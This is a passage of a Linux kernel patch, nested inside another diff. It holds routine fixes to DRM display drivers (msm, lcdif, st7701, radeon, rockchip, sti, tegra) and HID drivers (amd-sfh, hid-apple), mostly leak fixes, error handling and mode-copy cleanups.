+-	data = (final_scale - 9) * (dsc->nfl_bpg_offset + dsc->slice_bpg_offset);
+-	dsc->scale_increment_interval = (2048 * dsc->final_offset) / data;
+-
+-	dsc->scale_decrement_interval = groups_per_line / (dsc->initial_scale_value - 8);
+-
+-	return 0;
++	return drm_dsc_compute_rc_parameters(dsc);
+ }
+ 
+ static int dsi_host_parse_dt(struct msm_dsi_host *msm_host)
+diff --git a/drivers/gpu/drm/msm/hdmi/hdmi.c b/drivers/gpu/drm/msm/hdmi/hdmi.c
+index f28fb21e38911..8cd5d50639a53 100644
+--- a/drivers/gpu/drm/msm/hdmi/hdmi.c
++++ b/drivers/gpu/drm/msm/hdmi/hdmi.c
+@@ -252,7 +252,7 @@ static struct hdmi *msm_hdmi_init(struct platform_device *pdev)
+ 	if (hdmi->hpd_gpiod)
+ 		gpiod_set_consumer_name(hdmi->hpd_gpiod, "HDMI_HPD");
+ 
+-	pm_runtime_enable(&pdev->dev);
++	devm_pm_runtime_enable(&pdev->dev);
+ 
+ 	hdmi->workq = alloc_ordered_workqueue("msm_hdmi", 0);
+ 
+diff --git a/drivers/gpu/drm/mxsfb/lcdif_kms.c b/drivers/gpu/drm/mxsfb/lcdif_kms.c
+index b1092aab14231..71546a5d0a48c 100644
+--- a/drivers/gpu/drm/mxsfb/lcdif_kms.c
++++ b/drivers/gpu/drm/mxsfb/lcdif_kms.c
+@@ -5,6 +5,7 @@
+  * This code is based on drivers/gpu/drm/mxsfb/mxsfb*
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/io.h>
+ #include <linux/iopoll.h>
+@@ -52,16 +53,22 @@ static void lcdif_set_formats(struct lcdif_drm_private *lcdif,
+ 		writel(DISP_PARA_LINE_PATTERN_UYVY_H,
+ 		       lcdif->base + LCDC_V8_DISP_PARA);
+ 
+-		/* CSC: BT.601 Full Range RGB to YCbCr coefficients. */
+-		writel(CSC0_COEF0_A2(0x096) | CSC0_COEF0_A1(0x04c),
++		/*
++		 * CSC: BT.601 Limited Range RGB to YCbCr coefficients.
++		 *
++		 * |Y |   | 0.2568  0.5041  0.0979|   |R|   |16 |
++		 * |Cb| = |-0.1482 -0.2910  0.4392| * |G| + |128|
++		 * |Cr|   | 0.4392  0.4392 -0.3678|   |B|   |128|
++		 */
++		writel(CSC0_COEF0_A2(0x081) | CSC0_COEF0_A1(0x041),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF0);
+-		writel(CSC0_COEF1_B1(0x7d5) | CSC0_COEF1_A3(0x01d),
++		writel(CSC0_COEF1_B1(0x7db) | CSC0_COEF1_A3(0x019),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF1);
+-		writel(CSC0_COEF2_B3(0x080) | CSC0_COEF2_B2(0x7ac),
++		writel(CSC0_COEF2_B3(0x070) | CSC0_COEF2_B2(0x7b6),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF2);
+-		writel(CSC0_COEF3_C2(0x795) | CSC0_COEF3_C1(0x080),
++		writel(CSC0_COEF3_C2(0x7a2) | CSC0_COEF3_C1(0x070),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF3);
+-		writel(CSC0_COEF4_D1(0x000) | CSC0_COEF4_C3(0x7ec),
++		writel(CSC0_COEF4_D1(0x010) | CSC0_COEF4_C3(0x7ee),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF4);
+ 		writel(CSC0_COEF5_D3(0x080) | CSC0_COEF5_D2(0x080),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF5);
+@@ -142,14 +149,36 @@ static void lcdif_set_mode(struct lcdif_drm_private *lcdif, u32 bus_flags)
+ 	       CTRLDESCL0_1_WIDTH(m->hdisplay),
+ 	       lcdif->base + LCDC_V8_CTRLDESCL0_1);
+ 
+-	writel(CTRLDESCL0_3_PITCH(lcdif->crtc.primary->state->fb->pitches[0]),
+-	       lcdif->base + LCDC_V8_CTRLDESCL0_3);
++	/*
++	 * Undocumented P_SIZE and T_SIZE register but those written in the
++	 * downstream kernel those registers control the AXI burst size. As of
++	 * now there are two known values:
++	 *  1 - 128Byte
++	 *  2 - 256Byte
++	 * Downstream set it to 256B burst size to improve the memory
++	 * efficiency so set it here too.
++	 */
++	ctrl = CTRLDESCL0_3_P_SIZE(2) | CTRLDESCL0_3_T_SIZE(2) |
++	       CTRLDESCL0_3_PITCH(lcdif->crtc.primary->state->fb->pitches[0]);
++	writel(ctrl, lcdif->base + LCDC_V8_CTRLDESCL0_3);
+ }
+ 
+ static void lcdif_enable_controller(struct lcdif_drm_private *lcdif)
+ {
+ 	u32 reg;
+ 
++	/* Set FIFO Panic watermarks, low 1/3, high 2/3 . */
++	writel(FIELD_PREP(PANIC0_THRES_LOW_MASK, 1 * PANIC0_THRES_MAX / 3) |
++	       FIELD_PREP(PANIC0_THRES_HIGH_MASK, 2 * PANIC0_THRES_MAX / 3),
++	       lcdif->base + LCDC_V8_PANIC0_THRES);
++
++	/*
++	 * Enable FIFO Panic, this does not generate interrupt, but
++	 * boosts NoC priority based on FIFO Panic watermarks.
++	 */
++	writel(INT_ENABLE_D1_PLANE_PANIC_EN,
++	       lcdif->base + LCDC_V8_INT_ENABLE_D1);
++
+ 	reg = readl(lcdif->base + LCDC_V8_DISP_PARA);
+ 	reg |= DISP_PARA_DISP_ON;
+ 	writel(reg, lcdif->base + LCDC_V8_DISP_PARA);
+@@ -177,6 +206,9 @@ static void lcdif_disable_controller(struct lcdif_drm_private *lcdif)
+ 	reg = readl(lcdif->base + LCDC_V8_DISP_PARA);
+ 	reg &= ~DISP_PARA_DISP_ON;
+ 	writel(reg, lcdif->base + LCDC_V8_DISP_PARA);
++
++	/* Disable FIFO Panic NoC priority booster. */
++	writel(0, lcdif->base + LCDC_V8_INT_ENABLE_D1);
+ }
+ 
+ static void lcdif_reset_block(struct lcdif_drm_private *lcdif)
+diff --git a/drivers/gpu/drm/mxsfb/lcdif_regs.h b/drivers/gpu/drm/mxsfb/lcdif_regs.h
+index c70220651e3a5..37f0d9a06b104 100644
+--- a/drivers/gpu/drm/mxsfb/lcdif_regs.h
++++ b/drivers/gpu/drm/mxsfb/lcdif_regs.h
+@@ -190,6 +190,10 @@
+ #define CTRLDESCL0_1_WIDTH(n)		((n) & 0xffff)
+ #define CTRLDESCL0_1_WIDTH_MASK		GENMASK(15, 0)
+ 
++#define CTRLDESCL0_3_P_SIZE(n)		(((n) << 20) & CTRLDESCL0_3_P_SIZE_MASK)
++#define CTRLDESCL0_3_P_SIZE_MASK	GENMASK(22, 20)
++#define CTRLDESCL0_3_T_SIZE(n)		(((n) << 16) & CTRLDESCL0_3_T_SIZE_MASK)
++#define CTRLDESCL0_3_T_SIZE_MASK	GENMASK(17, 16)
+ #define CTRLDESCL0_3_PITCH(n)		((n) & 0xffff)
+ #define CTRLDESCL0_3_PITCH_MASK		GENMASK(15, 0)
+ 
+@@ -248,6 +252,7 @@
+ 
+ #define PANIC0_THRES_LOW_MASK		GENMASK(24, 16)
+ #define PANIC0_THRES_HIGH_MASK		GENMASK(8, 0)
++#define PANIC0_THRES_MAX		511
+ 
+ #define LCDIF_MIN_XRES			120
+ #define LCDIF_MIN_YRES			120
+diff --git a/drivers/gpu/drm/panel/panel-sitronix-st7701.c b/drivers/gpu/drm/panel/panel-sitronix-st7701.c
+index c481daa4bbceb..225b9884f61a9 100644
+--- a/drivers/gpu/drm/panel/panel-sitronix-st7701.c
++++ b/drivers/gpu/drm/panel/panel-sitronix-st7701.c
+@@ -244,7 +244,7 @@ static void st7701_init_sequence(struct st7701 *st7701)
+ 		   DSI_CMD2_BK0_INVSEL_ONES_MASK |
+ 		   FIELD_PREP(DSI_CMD2_BK0_INVSEL_NLINV_MASK, desc->nlinv),
+ 		   FIELD_PREP(DSI_CMD2_BK0_INVSEL_RTNI_MASK,
+-			      DIV_ROUND_UP(mode->htotal, 16)));
++			      (clamp((u32)mode->htotal, 512U, 1008U) - 512) / 16));
+ 
+ 	/* Command2, BK1 */
+ 	ST7701_DSI(st7701, DSI_CMD2BKX_SEL,
+@@ -762,7 +762,15 @@ static int st7701_dsi_probe(struct mipi_dsi_device *dsi)
+ 	st7701->dsi = dsi;
+ 	st7701->desc = desc;
+ 
+-	return mipi_dsi_attach(dsi);
++	ret = mipi_dsi_attach(dsi);
++	if (ret)
++		goto err_attach;
++
++	return 0;
++
++err_attach:
++	drm_panel_remove(&st7701->panel);
++	return ret;
+ }
+ 
+ static void st7701_dsi_remove(struct mipi_dsi_device *dsi)
+diff --git a/drivers/gpu/drm/radeon/radeon_bios.c b/drivers/gpu/drm/radeon/radeon_bios.c
+index 33121655d50bb..63bdc9f6fc243 100644
+--- a/drivers/gpu/drm/radeon/radeon_bios.c
++++ b/drivers/gpu/drm/radeon/radeon_bios.c
+@@ -227,6 +227,7 @@ static bool radeon_atrm_get_bios(struct radeon_device *rdev)
+ 
+ 	if (!found)
+ 		return false;
++	pci_dev_put(pdev);
+ 
+ 	rdev->bios = kmalloc(size, GFP_KERNEL);
+ 	if (!rdev->bios) {
+@@ -612,13 +613,14 @@ static bool radeon_acpi_vfct_bios(struct radeon_device *rdev)
+ 	acpi_size tbl_size;
+ 	UEFI_ACPI_VFCT *vfct;
+ 	unsigned offset;
++	bool r = false;
+ 
+ 	if (!ACPI_SUCCESS(acpi_get_table("VFCT", 1, &hdr)))
+ 		return false;
+ 	tbl_size = hdr->length;
+ 	if (tbl_size < sizeof(UEFI_ACPI_VFCT)) {
+ 		DRM_ERROR("ACPI VFCT table present but broken (too short #1)\n");
+-		return false;
++		goto out;
+ 	}
+ 
+ 	vfct = (UEFI_ACPI_VFCT *)hdr;
+@@ -631,13 +633,13 @@ static bool radeon_acpi_vfct_bios(struct radeon_device *rdev)
+ 		offset += sizeof(VFCT_IMAGE_HEADER);
+ 		if (offset > tbl_size) {
+ 			DRM_ERROR("ACPI VFCT image header truncated\n");
+-			return false;
++			goto out;
+ 		}
+ 
+ 		offset += vhdr->ImageLength;
+ 		if (offset > tbl_size) {
+ 			DRM_ERROR("ACPI VFCT image truncated\n");
+-			return false;
++			goto out;
+ 		}
+ 
+ 		if (vhdr->ImageLength &&
+@@ -649,15 +651,18 @@ static bool radeon_acpi_vfct_bios(struct radeon_device *rdev)
+ 			rdev->bios = kmemdup(&vbios->VbiosContent,
+ 					     vhdr->ImageLength,
+ 					     GFP_KERNEL);
++			if (rdev->bios)
++				r = true;
+ 
+-			if (!rdev->bios)
+-				return false;
+-			return true;
++			goto out;
+ 		}
+ 	}
+ 
+ 	DRM_ERROR("ACPI VFCT table present but broken (too short #2)\n");
+-	return false;
++
++out:
++	acpi_put_table(hdr);
++	return r;
+ }
+ #else
+ static inline bool radeon_acpi_vfct_bios(struct radeon_device *rdev)
+diff --git a/drivers/gpu/drm/rcar-du/Kconfig b/drivers/gpu/drm/rcar-du/Kconfig
+index fd2c2eaee26ba..a5518e90d6896 100644
+--- a/drivers/gpu/drm/rcar-du/Kconfig
++++ b/drivers/gpu/drm/rcar-du/Kconfig
+@@ -41,8 +41,6 @@ config DRM_RCAR_LVDS
+ 	depends on DRM_RCAR_USE_LVDS
+ 	select DRM_KMS_HELPER
+ 	select DRM_PANEL
+-	select OF_FLATTREE
+-	select OF_OVERLAY
+ 
+ config DRM_RCAR_USE_MIPI_DSI
+ 	bool "R-Car DU MIPI DSI Encoder Support"
+diff --git a/drivers/gpu/drm/rockchip/cdn-dp-core.c b/drivers/gpu/drm/rockchip/cdn-dp-core.c
+index 518ee13b1d6f4..8526dda919317 100644
+--- a/drivers/gpu/drm/rockchip/cdn-dp-core.c
++++ b/drivers/gpu/drm/rockchip/cdn-dp-core.c
+@@ -571,7 +571,7 @@ static void cdn_dp_encoder_mode_set(struct drm_encoder *encoder,
+ 	video->v_sync_polarity = !!(mode->flags & DRM_MODE_FLAG_NVSYNC);
+ 	video->h_sync_polarity = !!(mode->flags & DRM_MODE_FLAG_NHSYNC);
+ 
+-	memcpy(&dp->mode, adjusted, sizeof(*mode));
++	drm_mode_copy(&dp->mode, adjusted);
+ }
+ 
+ static bool cdn_dp_check_link_status(struct cdn_dp_device *dp)
+diff --git a/drivers/gpu/drm/rockchip/dw-mipi-dsi-rockchip.c b/drivers/gpu/drm/rockchip/dw-mipi-dsi-rockchip.c
+index f4df9820b295d..912eb4e94c595 100644
+--- a/drivers/gpu/drm/rockchip/dw-mipi-dsi-rockchip.c
++++ b/drivers/gpu/drm/rockchip/dw-mipi-dsi-rockchip.c
+@@ -1221,7 +1221,7 @@ static int dw_mipi_dsi_dphy_power_on(struct phy *phy)
+ 		return i;
+ 	}
+ 
+-	ret = pm_runtime_get_sync(dsi->dev);
++	ret = pm_runtime_resume_and_get(dsi->dev);
+ 	if (ret < 0) {
+ 		DRM_DEV_ERROR(dsi->dev, "failed to enable device: %d\n", ret);
+ 		return ret;
+diff --git a/drivers/gpu/drm/rockchip/inno_hdmi.c b/drivers/gpu/drm/rockchip/inno_hdmi.c
+index 87b2243ea23e3..f51774866f412 100644
+--- a/drivers/gpu/drm/rockchip/inno_hdmi.c
++++ b/drivers/gpu/drm/rockchip/inno_hdmi.c
+@@ -499,7 +499,7 @@ static void inno_hdmi_encoder_mode_set(struct drm_encoder *encoder,
+ 	inno_hdmi_setup(hdmi, adj_mode);
+ 
+ 	/* Store the display mode for plugin/DPMS poweron events */
+-	memcpy(&hdmi->previous_mode, adj_mode, sizeof(hdmi->previous_mode));
++	drm_mode_copy(&hdmi->previous_mode, adj_mode);
+ }
+ 
+ static void inno_hdmi_encoder_enable(struct drm_encoder *encoder)
+diff --git a/drivers/gpu/drm/rockchip/rk3066_hdmi.c b/drivers/gpu/drm/rockchip/rk3066_hdmi.c
+index cf2cf51091a3e..90145ad969841 100644
+--- a/drivers/gpu/drm/rockchip/rk3066_hdmi.c
++++ b/drivers/gpu/drm/rockchip/rk3066_hdmi.c
+@@ -395,7 +395,7 @@ rk3066_hdmi_encoder_mode_set(struct drm_encoder *encoder,
+ 	struct rk3066_hdmi *hdmi = encoder_to_rk3066_hdmi(encoder);
+ 
+ 	/* Store the display mode for plugin/DPMS poweron events. */
+-	memcpy(&hdmi->previous_mode, adj_mode, sizeof(hdmi->previous_mode));
++	drm_mode_copy(&hdmi->previous_mode, adj_mode);
+ }
+ 
+ static void rk3066_hdmi_encoder_enable(struct drm_encoder *encoder)
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+index c356de5dd2206..fa1f4ee6d1950 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+@@ -602,7 +602,7 @@ static int vop_enable(struct drm_crtc *crtc, struct drm_crtc_state *old_state)
+ 	struct vop *vop = to_vop(crtc);
+ 	int ret, i;
+ 
+-	ret = pm_runtime_get_sync(vop->dev);
++	ret = pm_runtime_resume_and_get(vop->dev);
+ 	if (ret < 0) {
+ 		DRM_DEV_ERROR(vop->dev, "failed to get pm runtime: %d\n", ret);
+ 		return ret;
+@@ -1983,7 +1983,7 @@ static int vop_initial(struct vop *vop)
+ 		return PTR_ERR(vop->dclk);
+ 	}
+ 
+-	ret = pm_runtime_get_sync(vop->dev);
++	ret = pm_runtime_resume_and_get(vop->dev);
+ 	if (ret < 0) {
+ 		DRM_DEV_ERROR(vop->dev, "failed to get pm runtime: %d\n", ret);
+ 		return ret;
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index 105a548d0abeb..8cecf81a5ae03 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -822,7 +822,7 @@ static void vop2_enable(struct vop2 *vop2)
+ {
+ 	int ret;
+ 
+-	ret = pm_runtime_get_sync(vop2->dev);
++	ret = pm_runtime_resume_and_get(vop2->dev);
+ 	if (ret < 0) {
+ 		drm_err(vop2->drm, "failed to get pm runtime: %d\n", ret);
+ 		return;
+diff --git a/drivers/gpu/drm/rockchip/rockchip_lvds.c b/drivers/gpu/drm/rockchip/rockchip_lvds.c
+index 5a284332ec49e..68f6ebb33460b 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_lvds.c
++++ b/drivers/gpu/drm/rockchip/rockchip_lvds.c
+@@ -152,7 +152,7 @@ static int rk3288_lvds_poweron(struct rockchip_lvds *lvds)
+ 		DRM_DEV_ERROR(lvds->dev, "failed to enable lvds pclk %d\n", ret);
+ 		return ret;
+ 	}
+-	ret = pm_runtime_get_sync(lvds->dev);
++	ret = pm_runtime_resume_and_get(lvds->dev);
+ 	if (ret < 0) {
+ 		DRM_DEV_ERROR(lvds->dev, "failed to get pm runtime: %d\n", ret);
+ 		clk_disable(lvds->pclk);
+@@ -336,16 +336,20 @@ static int px30_lvds_poweron(struct rockchip_lvds *lvds)
+ {
+ 	int ret;
+ 
+-	ret = pm_runtime_get_sync(lvds->dev);
++	ret = pm_runtime_resume_and_get(lvds->dev);
+ 	if (ret < 0) {
+ 		DRM_DEV_ERROR(lvds->dev, "failed to get pm runtime: %d\n", ret);
+ 		return ret;
+ 	}
+ 
+ 	/* Enable LVDS mode */
+-	return regmap_update_bits(lvds->grf, PX30_LVDS_GRF_PD_VO_CON1,
++	ret = regmap_update_bits(lvds->grf, PX30_LVDS_GRF_PD_VO_CON1,
+ 				  PX30_LVDS_MODE_EN(1) | PX30_LVDS_P2S_EN(1),
+ 				  PX30_LVDS_MODE_EN(1) | PX30_LVDS_P2S_EN(1));
++	if (ret)
++		pm_runtime_put(lvds->dev);
++
++	return ret;
+ }
+ 
+ static void px30_lvds_poweroff(struct rockchip_lvds *lvds)
+diff --git a/drivers/gpu/drm/sti/sti_dvo.c b/drivers/gpu/drm/sti/sti_dvo.c
+index b6ee8a82e656c..577c477b5f467 100644
+--- a/drivers/gpu/drm/sti/sti_dvo.c
++++ b/drivers/gpu/drm/sti/sti_dvo.c
+@@ -288,7 +288,7 @@ static void sti_dvo_set_mode(struct drm_bridge *bridge,
+ 
+ 	DRM_DEBUG_DRIVER("\n");
+ 
+-	memcpy(&dvo->mode, mode, sizeof(struct drm_display_mode));
++	drm_mode_copy(&dvo->mode, mode);
+ 
+ 	/* According to the path used (main or aux), the dvo clocks should
+ 	 * have a different parent clock. */
+@@ -346,8 +346,9 @@ static int sti_dvo_connector_get_modes(struct drm_connector *connector)
+ 
+ #define CLK_TOLERANCE_HZ 50
+ 
+-static int sti_dvo_connector_mode_valid(struct drm_connector *connector,
+-					struct drm_display_mode *mode)
++static enum drm_mode_status
++sti_dvo_connector_mode_valid(struct drm_connector *connector,
++			     struct drm_display_mode *mode)
+ {
+ 	int target = mode->clock * 1000;
+ 	int target_min = target - CLK_TOLERANCE_HZ;
+diff --git a/drivers/gpu/drm/sti/sti_hda.c b/drivers/gpu/drm/sti/sti_hda.c
+index 03cc401ed5934..15097ac679314 100644
+--- a/drivers/gpu/drm/sti/sti_hda.c
++++ b/drivers/gpu/drm/sti/sti_hda.c
+@@ -524,7 +524,7 @@ static void sti_hda_set_mode(struct drm_bridge *bridge,
+ 
+ 	DRM_DEBUG_DRIVER("\n");
+ 
+-	memcpy(&hda->mode, mode, sizeof(struct drm_display_mode));
++	drm_mode_copy(&hda->mode, mode);
+ 
+ 	if (!hda_get_mode_idx(hda->mode, &mode_idx)) {
+ 		DRM_ERROR("Undefined mode\n");
+@@ -601,8 +601,9 @@ static int sti_hda_connector_get_modes(struct drm_connector *connector)
+ 
+ #define CLK_TOLERANCE_HZ 50
+ 
+-static int sti_hda_connector_mode_valid(struct drm_connector *connector,
+-					struct drm_display_mode *mode)
++static enum drm_mode_status
++sti_hda_connector_mode_valid(struct drm_connector *connector,
++			     struct drm_display_mode *mode)
+ {
+ 	int target = mode->clock * 1000;
+ 	int target_min = target - CLK_TOLERANCE_HZ;
+diff --git a/drivers/gpu/drm/sti/sti_hdmi.c b/drivers/gpu/drm/sti/sti_hdmi.c
+index cb82622877d20..8539fe1fedc4c 100644
+--- a/drivers/gpu/drm/sti/sti_hdmi.c
++++ b/drivers/gpu/drm/sti/sti_hdmi.c
+@@ -941,7 +941,7 @@ static void sti_hdmi_set_mode(struct drm_bridge *bridge,
+ 	DRM_DEBUG_DRIVER("\n");
+ 
+ 	/* Copy the drm display mode in the connector local structure */
+-	memcpy(&hdmi->mode, mode, sizeof(struct drm_display_mode));
++	drm_mode_copy(&hdmi->mode, mode);
+ 
+ 	/* Update clock framerate according to the selected mode */
+ 	ret = clk_set_rate(hdmi->clk_pix, mode->clock * 1000);
+@@ -1004,8 +1004,9 @@ fail:
+ 
+ #define CLK_TOLERANCE_HZ 50
+ 
+-static int sti_hdmi_connector_mode_valid(struct drm_connector *connector,
+-					struct drm_display_mode *mode)
++static enum drm_mode_status
++sti_hdmi_connector_mode_valid(struct drm_connector *connector,
++			      struct drm_display_mode *mode)
+ {
+ 	int target = mode->clock * 1000;
+ 	int target_min = target - CLK_TOLERANCE_HZ;
+diff --git a/drivers/gpu/drm/tegra/dc.c b/drivers/gpu/drm/tegra/dc.c
+index bd0f60704467f..a67453cee8832 100644
+--- a/drivers/gpu/drm/tegra/dc.c
++++ b/drivers/gpu/drm/tegra/dc.c
+@@ -3205,8 +3205,10 @@ static int tegra_dc_probe(struct platform_device *pdev)
+ 	usleep_range(2000, 4000);
+ 
+ 	err = reset_control_assert(dc->rst);
+-	if (err < 0)
++	if (err < 0) {
++		clk_disable_unprepare(dc->clk);
+ 		return err;
++	}
+ 
+ 	usleep_range(2000, 4000);
+ 
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_client.c b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+index 8275bba636119..ab125f79408f2 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_client.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+@@ -237,6 +237,10 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 		in_data->sensor_virt_addr[i] = dma_alloc_coherent(dev, sizeof(int) * 8,
+ 								  &cl_data->sensor_dma_addr[i],
+ 								  GFP_KERNEL);
++		if (!in_data->sensor_virt_addr[i]) {
++			rc = -ENOMEM;
++			goto cleanup;
++		}
+ 		cl_data->sensor_sts[i] = SENSOR_DISABLED;
+ 		cl_data->sensor_requested_cnt[i] = 0;
+ 		cl_data->cur_hid_dev = i;
+diff --git a/drivers/hid/hid-apple.c b/drivers/hid/hid-apple.c
+index 6970797cdc56d..c671ce94671ca 100644
+--- a/drivers/hid/hid-apple.c
++++ b/drivers/hid/hid-apple.c
+@@ -314,6 +314,7 @@ static const struct apple_key_translation swapped_option_cmd_keys[] = {
+ 
+ static const struct apple_key_translation swapped_fn_leftctrl_keys[] = {
+ 	{ KEY_FN, KEY_LEFTCTRL },
++	{ KEY_LEFTCTRL, KEY_FN },
+ 	{ }
+ };
+ 
+@@ -375,24 +376,40 @@ static int hidinput_apple_event(struct hid_device *hid, struct input_dev *input,
+ 	struct apple_sc *asc = hid_get_drvdata(hid);
+ 	const struct apple_key_translation *trans, *table;
+ 	bool do_translate;
+-	u16 code = 0;
++	u16 code = usage->code;
+ 	unsigned int real_fnmode;
+ 
+-	u16 fn_keycode = (swap_fn_leftctrl) ? (KEY_LEFTCTRL) : (KEY_FN);
+-
+-	if (usage->code == fn_keycode) {
+-		asc->fn_on = !!value;
+-		input_event_with_scancode(input, usage->type, KEY_FN,
+-				usage->hid, value);
+-		return 1;
+-	}
+-
+ 	if (fnmode == 3) {
+ 		real_fnmode = (asc->quirks & APPLE_IS_NON_APPLE) ? 2 : 1;
+ 	} else {
+ 		real_fnmode = fnmode;
+ 	}
+ 
++	if (swap_fn_leftctrl) {
++		trans = apple_find_translation(swapped_fn_leftctrl_keys, code);
++
++		if (trans)
++			code = trans->to;
++	}
++
++	if (iso_layout > 0 || (iso_layout < 0 && (asc->quirks & APPLE_ISO_TILDE_QUIRK) &&
++			hid->country == HID_COUNTRY_INTERNATIONAL_ISO)) {
++		trans = apple_find_translation(apple_iso_keyboard, code);
++
++		if (trans)
++			code = trans->to;
++	}
++
++	if (swap_opt_cmd) {
++		trans = apple_find_translation(swapped_option_cmd_keys, code);
++
++		if (trans)
++			code = trans->to;
++	}
++
++	if (code == KEY_FN)
++		asc->fn_on = !!value;
++
+ 	if (real_fnmode) {
+ 		if (hid->product == USB_DEVICE_ID_APPLE_ALU_WIRELESS_ANSI ||
+ 		    hid->product == USB_DEVICE_ID_APPLE_ALU_WIRELESS_ISO ||
+@@ -430,15 +447,18 @@ static int hidinput_apple_event(struct hid_device *hid, struct input_dev *input,
+ 		else
+ 			table = apple_fn_keys;
+ 
+-		trans = apple_find_translation (table, usage->code);
++		trans = apple_find_translation(table, code);
+ 
+ 		if (trans) {
+-			if (test_bit(trans->from, input->key))
++			bool from_is_set = test_bit(trans->from, input->key);
++			bool to_is_set = test_bit(trans->to, input->key);
++
++			if (from_is_set)
+ 				code = trans->from;
+-			else if (test_bit(trans->to, input->key))
++			else if (to_is_set)
+ 				code = trans->to;
+ 
+-			if (!code) {
++			if (!(from_is_set || to_is_set)) {
+ 				if (trans->flags & APPLE_FLAG_FKEY) {
+ 					switch (real_fnmode) {
+ 					case 1:
+@@ -455,62 +475,31 @@ static int hidinput_apple_event(struct hid_device *hid, struct input_dev *input,
+ 					do_translate = asc->fn_on;
+ 				}
+ 
+-				code = do_translate ? trans->to : trans->from;
++				if (do_translate)
++					code = trans->to;
+ 			}
+-
+-			input_event_with_scancode(input, usage->type, code,
+-					usage->hid, value);
+-			return 1;
+ 		}
+ 
+ 		if (asc->quirks & APPLE_NUMLOCK_EMULATION &&
+-				(test_bit(usage->code, asc->pressed_numlock) ||
++				(test_bit(code, asc->pressed_numlock) ||
+ 				test_bit(LED_NUML, input->led))) {
+-			trans = apple_find_translation(powerbook_numlock_keys,
+-					usage->code);
++			trans = apple_find_translation(powerbook_numlock_keys, code);
+ 
+ 			if (trans) {
+ 				if (value)
+-					set_bit(usage->code,
+-							asc->pressed_numlock);
++					set_bit(code, asc->pressed_numlock);
+ 				else
+-					clear_bit(usage->code,
+-							asc->pressed_numlock);
++					clear_bit(code, asc->pressed_numlock);
+ 
+-				input_event_with_scancode(input, usage->type,
+-						trans->to, usage->hid, value);
++				code = trans->to;
+ 			}
+-
+-			return 1;
+ 		}
+ 	}
+ 
+-	if (iso_layout > 0 || (iso_layout < 0 && (asc->quirks & APPLE_ISO_TILDE_QUIRK) &&
+-			hid->country == HID_COUNTRY_INTERNATIONAL_ISO)) {
+-		trans = apple_find_translation(apple_iso_keyboard, usage->code);
+-		if (trans) {
+-			input_event_with_scancode(input, usage->type,
+-					trans->to, usage->hid, value);
+-			return 1;
+-		}
+-	}
+-
+-	if (swap_opt_cmd) {
+-		trans = apple_find_translation(swapped_option_cmd_keys, usage->code);
+-		if (trans) {
+-			input_event_with_scancode(input, usage->type,
+-					trans->to, usage->hid, value);
+-			return 1;
+-		}
+-	}
++	if (usage->code != code) {
++		input_event_with_scancode(input, usage->type, code, usage->hid, value);
+ 
+-	if (swap_fn_leftctrl) {
+-		trans = apple_find_translation(swapped_fn_leftctrl_keys, usage->code);
+-		if (trans) {
+-			input_event_with_scancode(input, usage->type,
+-					trans->to, usage->hid, value);
+-			return 1;
+-		}
++		return 1;
+ 	}
+ 
+ 	return 0;
+@@ -640,9 +629,6 @@ static void apple_setup_input(struct input_dev *input)
+ 	apple_setup_key_translation(input, apple2021_fn_keys);
+ 	apple_setup_key_translation(input, macbookpro_no_esc_fn_keys);
+ 	apple_setup_key_translation(input, macbookpro_dedicated_esc_fn_keys);
+-
+-	if (swap_fn_leftctrl)
+-		apple_setup_key_translation(input, swapped_fn_leftctrl_keys);
+ }
+ 
+ static int apple_input_mapping(struct hid_device *hdev, struct hid_input *hi,
+@@ -1011,21 +997,21 @@ static const struct hid_device_id apple_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING9_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J140K),
+-		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL },
++		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J132),
+-		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL },
++		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J680),
+-		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL },
++		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J213),
+-		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL },
++		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J214K),
+-		.driver_data = APPLE_HAS_FN },
